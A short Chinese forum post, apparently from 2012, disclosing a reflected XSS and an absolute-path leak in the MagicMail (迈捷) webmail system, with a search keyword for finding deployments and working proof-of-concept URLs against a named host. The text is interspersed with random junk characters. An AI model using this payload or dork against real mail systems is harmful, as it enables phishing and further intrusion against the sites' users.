今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞% `9 @$ r9 i* x% V% e7 x! [% N
3 \ v7 m& \5 B2 c8 V
6 h0 {. B8 c( W包含 一个反射性XSS 以及 绝对路径泄漏
+ B+ _- v3 A# }; |! h+ M* c看了看 貌似全部是linux的。
% a, z! c5 ]' G3 e5 ?
) j( N6 Z5 F4 N6 B4 q9 t0 L关键字:迈捷邮件系统 by MagicMail& T6 U" K6 n3 \9 [# @5 R
- W; |0 E4 f: a( Y6 u( Y可以看到很多政府网站都用这个邮件系统5 L4 g: w4 [6 N, K9 Q
' o% d# p% {# O) Y! }7 I
绝对路径 http://madman.in/index.php?login_type=declare&language=2 J2 e5 G! z0 h- t! G
/ w2 L$ Q( c/ N+ ~/ S" ?3 ~
; G. q7 y& h6 ]! s8 k$ k, e5 s0 |% W1 ]
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 ^- V- J) X/ W9 _) w0 ^7 F
/ z( {$ Z0 T/ g. ]% x+ _7 @' N
' {6 O4 O# I( T+ U2 Z' _
( J) M5 F9 a1 G% R- D
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等' P! D$ R. p6 `: s# g: R8 T
( F! h9 H2 Q) t$ n8 Y- E) Z6 z
修复方案:看官方补丁吧。9 G* F' M# j7 H3 w2 n: S2 v
|
发表于 2012-11-9 20:38:41
收藏
支持
反对